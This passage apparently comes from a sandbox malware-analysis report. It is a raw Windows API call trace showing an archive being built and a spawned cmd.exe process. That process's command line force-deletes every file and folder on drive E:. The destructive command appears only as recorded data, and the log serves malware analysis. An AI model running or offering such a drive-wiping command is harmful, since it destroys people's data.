CloseHandle (hObject=0xc8) returned 1 [0063.793] CloseHandle (hObject=0xc4) returned 1 [0063.794] free (_Block=0x1c83a90) [0063.794] free (_Block=0x0) [0063.794] free (_Block=0x1c85460) [0063.794] free (_Block=0x1c80700) [0063.794] free (_Block=0x1c80ac0) [0063.794] free (_Block=0x27f568) [0063.794] free (_Block=0x0) [0063.794] free (_Block=0x1c83550) [0063.794] free (_Block=0x1c84c70) [0063.794] free (_Block=0x1c83520) [0063.794] free (_Block=0x1c84c28) [0063.794] free (_Block=0x1c834f0) [0063.794] free (_Block=0x1c84be0) [0063.795] free (_Block=0x1c834c0) [0063.795] free (_Block=0x1c84b98) [0063.795] free (_Block=0x1c85168) [0063.795] free (_Block=0x1c84b50) [0063.795] free (_Block=0x1c82b88) [0063.795] free (_Block=0x1c84b08) [0063.795] free (_Block=0x1c85208) [0063.795] free (_Block=0x1c84ac0) [0063.795] free (_Block=0x1c83490) [0063.795] free (_Block=0x1c84a30) [0063.795] free (_Block=0x1c84a78) [0063.795] free (_Block=0x1c849e8) [0063.795] free (_Block=0x1c851b8) [0063.795] free (_Block=0x1c849a0) [0063.795] free (_Block=0x1c852a8) [0063.795] free (_Block=0x1c84958) [0063.795] free (_Block=0x1c85248) [0063.795] free (_Block=0x1c84910) [0063.795] free (_Block=0x1c83460) [0063.795] free (_Block=0x1c848c8) [0063.796] free (_Block=0x1c85040) [0063.796] free (_Block=0x1c84838) [0063.796] free (_Block=0x1c84880) [0063.796] free (_Block=0x1c847f0) [0063.796] free (_Block=0x1c85090) [0063.796] free (_Block=0x1c847a8) [0063.796] free (_Block=0x1c82068) [0063.796] free (_Block=0x1c84760) [0063.796] free (_Block=0x1c85108) [0063.796] free (_Block=0x1c845b0) [0063.796] free (_Block=0x1c828d8) [0063.796] free (_Block=0x1c84718) [0063.796] free (_Block=0x1c82a30) [0063.796] free (_Block=0x1c84688) [0063.796] free (_Block=0x1c846d0) [0063.796] free (_Block=0x1c84640) [0063.796] free (_Block=0x1c80380) [0063.796] free (_Block=0x1c84400) [0063.796] free (_Block=0x1c845f8) [0063.796] free (_Block=0x1c84520) [0063.797] free (_Block=0x1c84568) [0063.797] free (_Block=0x1c844d8) [0063.797] free (_Block=0x1c82898) [0063.797] free (_Block=0x1c843b8) [0063.797] free (_Block=0x1c84490) [0063.797] free (_Block=0x1c84448) [0063.797] free (_Block=0x1c83370) [0063.797] free (_Block=0x1c84370) [0063.797] free (_Block=0x1c833d0) [0063.797] free (_Block=0x1c84328) [0063.797] free (_Block=0x1c82b60) [0063.797] free (_Block=0x1c842e0) [0063.797] free (_Block=0x1c82b38) [0063.797] free (_Block=0x1c84298) [0063.797] free (_Block=0x1c80220) [0063.797] free (_Block=0x1c84250) [0063.797] free (_Block=0x1c80360) [0063.797] free (_Block=0x1c84208) [0063.797] free (_Block=0x1c810d8) [0063.798] free (_Block=0x1c841c0) [0063.798] free (_Block=0x1c810a0) [0063.798] free (_Block=0x1c84178) [0063.798] free (_Block=0x1c82aa0) [0063.798] free (_Block=0x1c84130) [0063.798] free (_Block=0x1c801c0) [0063.799] free (_Block=0x1c840e8) [0063.799] free (_Block=0x1c800c0) [0063.799] free (_Block=0x1c840a0) [0063.799] free (_Block=0x1c80580) [0063.799] free (_Block=0x1c84058) [0063.799] free (_Block=0x1c83310) [0063.799] free (_Block=0x1c84010) [0063.799] free (_Block=0x1c833a0) [0063.799] free (_Block=0x1c83fc8) [0063.799] free (_Block=0x1c85398) [0063.799] malloc (_Size=0x8) returned 0x1c80ac0 [0063.799] free (_Block=0x0) [0063.799] malloc (_Size=0x1) returned 0x1c80aa0 [0063.799] free (_Block=0x0) [0063.800] malloc (_Size=0x4) returned 0x1c80bc0 [0063.800] free (_Block=0x0) [0063.800] malloc (_Size=0x10) returned 0x27f568 [0063.800] malloc (_Size=0x18) returned 0x1c801c0 [0063.800] malloc (_Size=0x18) returned 0x1c80360 [0063.800] malloc (_Size=0x18) returned 0x1c80220 [0063.800] malloc (_Size=0x18) returned 0x1c80380 [0063.801] malloc (_Size=0x20) returned 0x1c82b60 [0063.801] malloc (_Size=0x1) returned 0x1c80a80 [0063.801] free (_Block=0x0) [0063.801] malloc (_Size=0x4) returned 0x1c89f08 [0063.801] free (_Block=0x0) [0063.801] malloc (_Size=0x18) returned 0x1c80700 [0063.801] malloc (_Size=0x4) returned 0x1c89f18 [0063.801] free (_Block=0x0) [0063.801] malloc (_Size=0x4) returned 0x1c89f28 [0063.801] free (_Block=0x0) [0063.801] malloc (_Size=0x4) returned 0x1c89f38 [0063.801] free (_Block=0x0) [0063.801] malloc (_Size=0x4) returned 0x1c89f48 [0063.801] free (_Block=0x0) [0063.801] malloc (_Size=0x4) returned 0x1c89f58 [0063.801] free (_Block=0x0) [0063.801] free (_Block=0x0) [0063.801] malloc (_Size=0x1) returned 0x1c89f68 [0063.801] free (_Block=0x1c89f68) [0063.802] malloc (_Size=0x8) returned 0x1c89f68 [0063.802] free (_Block=0x0) [0063.802] free (_Block=0x0) [0063.802] malloc (_Size=0x1) returned 0x1c89f78 [0063.802] free (_Block=0x1c89f78) [0063.802] free (_Block=0x0) [0063.802] malloc (_Size=0x4) returned 0x1c89f78 [0063.802] free (_Block=0x0) [0063.802] malloc (_Size=0x4) returned 0x1c89f88 [0063.802] free (_Block=0x0) [0063.802] malloc (_Size=0x4) returned 0x1c89f98 [0063.802] malloc (_Size=0x84) returned 0x1c86660 [0063.802] free (_Block=0x0) [0063.802] malloc (_Size=0x4) returned 0x1c89fa8 [0063.804] free (_Block=0x1c80600) [0063.804] free (_Block=0x1c89330) [0063.804] malloc (_Size=0x1) returned 0x1c89fe8 [0063.805] free (_Block=0x0) [0063.805] malloc (_Size=0x1) returned 0x1c89ff8 [0063.805] free (_Block=0x0) [0063.805] malloc (_Size=0x88) returned 0x1c866f0 [0063.805] malloc (_Size=0x4) returned 0x1c8a008 [0063.805] free (_Block=0x0) [0063.805] free (_Block=0x0) [0063.805] malloc (_Size=0x8) returned 0x1c8a018 [0063.805] free (_Block=0x0) [0063.805] malloc (_Size=0x4) returned 0x1c8a028 [0063.805] malloc (_Size=0x20) returned 0x1c82cc8 [0063.805] realloc (_Block=0x0, _Size=0x5) returned 0x1c8a048 [0063.814] free (_Block=0x1c800c0) [0063.814] free (_Block=0x1c80580) [0063.814] free (_Block=0x1c82b38) [0063.814] free (_Block=0x1c80aa0) [0063.814] free (_Block=0x1c8a088) [0063.814] free (_Block=0x1c8a098) [0063.814] free (_Block=0x1c8a068) [0063.814] free (_Block=0x1c8a078) [0063.814] free (_Block=0x1c8a0b8) [0063.814] free (_Block=0x1c8a0a8) [0063.814] free (_Block=0x1c8a028) [0063.814] free (_Block=0x1c8a018) [0063.815] VirtualFree (lpAddress=0x410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.817] VirtualFree (lpAddress=0x1d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.818] free (_Block=0x1cc9998) [0063.818] free (_Block=0x1ccca20) [0063.818] free (_Block=0x1cb9910) [0063.818] free (_Block=0x1c8cc48) [0063.818] free (_Block=0x1c82b88) [0063.818] free (_Block=0x1c866f0) [0063.818] free (_Block=0x1c8a008) [0063.818] free (_Block=0x0) [0063.818] free (_Block=0x1c89ff8) [0063.818] free (_Block=0x1c89fe8) [0063.818] free (_Block=0x1c89fd8) [0063.818] free (_Block=0x1c89fc8) [0063.818] free (_Block=0x1c89fb8) [0063.818] free (_Block=0x0) [0063.818] free (_Block=0x1c89fa8) [0063.818] free (_Block=0x1c86660) [0063.818] free (_Block=0x1c80bc0) [0063.818] free (_Block=0x0) [0063.818] free (_Block=0x0) [0063.819] free (_Block=0x1c8be40) [0063.819] WriteFile (in: hFile=0x80, lpBuffer=0x230000*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x22ec3c, lpOverlapped=0x0 | out: lpBuffer=0x230000*, lpNumberOfBytesWritten=0x22ec3c*=0x25, lpOverlapped=0x0) returned 1 [0063.819] SetFilePointer (in: hFile=0x80, lDistanceToMove=8, lpDistanceToMoveHigh=0x22ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x22ec78*=0) returned 0x8 [0063.819] WriteFile (in: hFile=0x80, lpBuffer=0x22ec8c*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x22ec1c, lpOverlapped=0x0 | out: lpBuffer=0x22ec8c*, lpNumberOfBytesWritten=0x22ec1c*=0x18, lpOverlapped=0x0) returned 1 [0063.821] free (_Block=0x1c8a2f8) [0063.821] free (_Block=0x1c878d0) [0063.821] free (_Block=0x1c8a1a8) [0063.821] free (_Block=0x0) [0063.821] free (_Block=0x1c8a1d8) [0063.821] free (_Block=0x1c87788) [0063.821] free (_Block=0x1c8a208) [0063.821] free (_Block=0x0) [0063.821] free (_Block=0x1c836a0) [0063.821] free (_Block=0x0) [0063.821] free (_Block=0x1c83580) [0063.821] free (_Block=0x1c8a238) [0063.821] free (_Block=0x1c89a20) [0063.821] free (_Block=0x1c8a328) [0063.821] free (_Block=0x1c899f0) [0063.821] free (_Block=0x1c8a268) [0063.822] free (_Block=0x1c89990) [0063.822] free (_Block=0x1c8a2c8) [0063.822] free (_Block=0x1c899c0) [0063.822] free (_Block=0x1c88700) [0063.822] free (_Block=0x1c89960) [0063.822] free (_Block=0x1c82e08) [0063.822] free (_Block=0x1c89930) [0063.822] free (_Block=0x1c87f20) [0063.822] free (_Block=0x1c89900) [0063.822] free (_Block=0x1c8a298) [0063.822] free (_Block=0x1c898d0) [0063.822] free (_Block=0x1c84eb0) [0063.822] free (_Block=0x1c898a0) [0063.822] free (_Block=0x1c86570) [0063.822] free (_Block=0x1c89870) [0063.822] free (_Block=0x1c89580) [0063.822] free (_Block=0x1c89840) [0063.822] free (_Block=0x1c87f80) [0063.822] free (_Block=0x1c89810) [0063.822] free (_Block=0x1c884c0) [0063.822] free (_Block=0x1c897e0) [0063.822] free (_Block=0x1c84e68) [0063.822] free (_Block=0x1c87d80) [0063.823] free (_Block=0x1c892e0) [0063.823] free (_Block=0x1c87d50) [0063.823] free (_Block=0x1c822d0) [0063.823] free (_Block=0x1c87d20) [0063.823] free (_Block=0x1c89280) [0063.823] free (_Block=0x1c87cf0) [0063.823] free (_Block=0x1c86538) [0063.823] free (_Block=0x1c87cc0) [0063.823] free (_Block=0x1c84e20) [0063.823] free (_Block=0x1c87c90) [0063.823] free (_Block=0x1c84dd8) [0063.823] free (_Block=0x1c87c60) [0063.823] free (_Block=0x1c84d90) [0063.823] free (_Block=0x1c87c30) [0063.823] free (_Block=0x1c88280) [0063.823] free (_Block=0x1c87c00) [0063.823] free (_Block=0x1c84cb8) [0063.823] free (_Block=0x1c87b40) [0063.823] free (_Block=0x1c83670) [0063.823] free (_Block=0x1c87a68) [0063.823] free (_Block=0x1c82db8) [0063.823] free (_Block=0x1c87a98) [0063.823] free (_Block=0x1c82d90) [0063.823] free (_Block=0x1c87ab0) [0063.824] free (_Block=0x1c86268) [0063.824] free (_Block=0x1c87ba0) [0063.824] free (_Block=0x1c86228) [0063.824] free (_Block=0x1c87b70) [0063.824] free (_Block=0x1c812f0) [0063.824] free (_Block=0x1c87ac8) [0063.824] free (_Block=0x1c87e60) [0063.824] free (_Block=0x1c87b10) [0063.824] free (_Block=0x1c87ee8) [0063.824] free (_Block=0x1c87a50) [0063.824] free (_Block=0x1c861a8) [0063.824] free (_Block=0x1c87ae0) [0063.824] free (_Block=0x1c86128) [0063.824] free (_Block=0x1c879d8) [0063.824] free (_Block=0x1c80800) [0063.824] free (_Block=0x27f640) [0063.824] free (_Block=0x1c83640) [0063.824] free (_Block=0x27f4d8) [0063.824] free (_Block=0x1c83610) [0063.824] free (_Block=0x27f628) [0063.824] free (_Block=0x1c835e0) [0063.824] free (_Block=0x27f5f8) [0063.825] free (_Block=0x1c85338) [0063.825] free (_Block=0x27f5e0) [0063.825] free (_Block=0x1c80620) [0063.825] free (_Block=0x27f598) [0063.825] free (_Block=0x1c835b0) [0063.825] free (_Block=0x27f5c8) [0063.825] free (_Block=0x1c895d8) [0063.825] free (_Block=0x1c88fe8) [0063.825] free (_Block=0x1c89ef8) [0063.825] free (_Block=0x1c89ee8) [0063.825] free (_Block=0x0) [0063.825] free (_Block=0x1c89a38) [0063.825] free (_Block=0x1c88800) [0063.827] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.894] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.894] malloc (_Size=0x4) returned 0x27d790 [0063.894] malloc (_Size=0x20) returned 0x1c82b10 [0063.894] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0063.895] fputs (in: _Str="Files read from disk: 36\nArchive size: 2789880 bytes (2725 KiB)\n", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.896] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.896] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.896] fputs (in: _Str="Everything is Ok", _File=0x77032920 | out: _File=0x77032920) returned 0 [0063.897] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0063.898] SetConsoleCtrlHandler (HandlerRoutine=0x3844de, Add=0) returned 1 [0063.898] exit (_Code=0) [0063.898] free (_Block=0x1c82278) [0063.898] free (_Block=0x1c84d48) [0063.898] free (_Block=0x1c83c40) Thread: id = 31 os_tid = 0x8c8 Thread: id = 35 os_tid = 0x938 [0058.592] WaitForSingleObject (hHandle=0xdc, dwMilliseconds=0xffffffff) returned 0x0 [0058.593] free (_Block=0x0) [0058.593] malloc (_Size=0x4) returned 0x1c83c10 [0058.593] free (_Block=0x0) [0058.593] malloc (_Size=0x4) returned 0x1c83c20 [0058.593] malloc (_Size=0x54) returned 0x1c86710 [0062.398] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x2050000 [0062.399] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 [0062.696] free (_Block=0x1c87a20) [0062.696] SetEvent (hEvent=0xe0) returned 1 [0062.696] WaitForSingleObject (hHandle=0xdc, dwMilliseconds=0xffffffff) returned 0x0 [0062.703] WaitForSingleObject (hHandle=0xd4, dwMilliseconds=0xffffffff) returned 0x0 Process: id = "25" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x43fe1000" os_pid = "0x8a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 30 os_tid = 0x8b8 [0057.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31f9c4 | out: lpSystemTimeAsFileTime=0x31f9c4*(dwLowDateTime=0x1fd4600, dwHighDateTime=0x1d62400)) [0057.883] GetCurrentProcessId () returned 0x8a8 [0057.883] GetCurrentThreadId () returned 0x8b8 [0057.883] GetTickCount () returned 0x1146a38 [0057.883] QueryPerformanceCounter (in: lpPerformanceCount=0x31f9bc | out: lpPerformanceCount=0x31f9bc*=17801679780) returned 1 [0057.885] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0057.885] __set_app_type (_Type=0x1) [0057.885] __p__fmode () returned 0x770331f4 [0057.885] __p__commode () returned 0x770331fc [0057.885] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0057.885] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0057.887] GetCurrentThreadId () returned 0x8b8 [0057.887] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8b8) returned 0x60 [0057.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0057.887] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0057.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0057.888] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0057.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x31f954 | out: phkResult=0x31f954*=0x0) returned 0x2 [0057.889] VirtualQuery (in: lpAddress=0x31f98b, lpBuffer=0x31f924, dwLength=0x1c | out: lpBuffer=0x31f924*(BaseAddress=0x31f000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.889] VirtualQuery (in: lpAddress=0x220000, lpBuffer=0x31f924, dwLength=0x1c | out: lpBuffer=0x31f924*(BaseAddress=0x220000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0057.889] VirtualQuery (in: lpAddress=0x221000, lpBuffer=0x31f924, dwLength=0x1c | out: lpBuffer=0x31f924*(BaseAddress=0x221000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0057.889] VirtualQuery (in: lpAddress=0x223000, lpBuffer=0x31f924, dwLength=0x1c | out: lpBuffer=0x31f924*(BaseAddress=0x223000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.889] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x31f924, dwLength=0x1c | out: lpBuffer=0x31f924*(BaseAddress=0x320000, AllocationBase=0x320000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0057.889] GetConsoleOutputCP () returned 0x1b5 [0057.889] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0057.889] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0057.889] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.889] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0057.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0057.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0057.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0057.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0057.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0057.891] GetEnvironmentStringsW () returned 0x7920f8* [0057.891] GetProcessHeap () returned 0x780000 [0057.891] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xaca) returned 0x792bd0 [0057.891] FreeEnvironmentStringsW (penv=0x7920f8) returned 1 [0057.891] GetProcessHeap () returned 0x780000 [0057.891] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4) returned 0x791898 [0057.891] GetEnvironmentStringsW () returned 0x7920f8* [0057.891] GetProcessHeap () returned 0x780000 [0057.891] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xaca) returned 0x7936a8 [0057.891] FreeEnvironmentStringsW (penv=0x7920f8) returned 1 [0057.891] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31e8c4 | out: phkResult=0x31e8c4*=0x68) returned 0x0 [0057.891] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x0, lpData=0x31e8d0*=0x0, lpcbData=0x31e8c8*=0x1000) returned 0x2 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x1, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x0, lpData=0x31e8d0*=0x1, lpcbData=0x31e8c8*=0x1000) returned 0x2 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x0, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x40, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x40, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x0, lpData=0x31e8d0*=0x40, lpcbData=0x31e8c8*=0x1000) returned 0x2 [0057.892] RegCloseKey (hKey=0x68) returned 0x0 [0057.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31e8c4 | out: phkResult=0x31e8c4*=0x68) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x0, lpData=0x31e8d0*=0x40, lpcbData=0x31e8c8*=0x1000) returned 0x2 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x1, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x0, lpData=0x31e8d0*=0x1, lpcbData=0x31e8c8*=0x1000) returned 0x2 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x0, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x9, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x4, lpData=0x31e8d0*=0x9, lpcbData=0x31e8c8*=0x4) returned 0x0 [0057.892] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31e8cc, lpData=0x31e8d0, lpcbData=0x31e8c8*=0x1000 | out: lpType=0x31e8cc*=0x0, lpData=0x31e8d0*=0x9, lpcbData=0x31e8c8*=0x1000) returned 0x2 [0057.892] RegCloseKey (hKey=0x68) returned 0x0 [0057.893] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b66 [0057.893] srand (_Seed=0x5eb34b66) [0057.893] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q" [0057.893] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"E:\" del /f /s /q \"E:\" & FOR /D %p IN (\"E:\") DO rmdir \"%p\" /s /q" [0057.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.893] GetProcessHeap () returned 0x780000 [0057.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x210) returned 0x7920f8 [0057.893] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x792100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0057.893] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0057.893] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.893] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.893] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0057.893] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0057.893] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0057.893] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0057.894] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0057.894] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0057.894] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0057.894] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0057.894] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0057.894] GetProcessHeap () returned 0x780000 [0057.894] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x792bd0 | out: hHeap=0x780000) returned 1 [0057.894] GetEnvironmentStringsW () returned 0x792310* [0057.894] GetProcessHeap () returned 0x780000 [0057.894] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xae2) returned 0x794c70 [0057.894] FreeEnvironmentStringsW (penv=0x792310) returned 1 [0057.894] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0057.894] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0057.894] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0057.894] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0057.894] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0057.894] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0057.894] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0057.894] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0057.895] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0057.895] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0057.895] GetProcessHeap () returned 0x780000 [0057.895] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x54) returned 0x7917c8 [0057.895] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31f690 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0057.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x31f690, 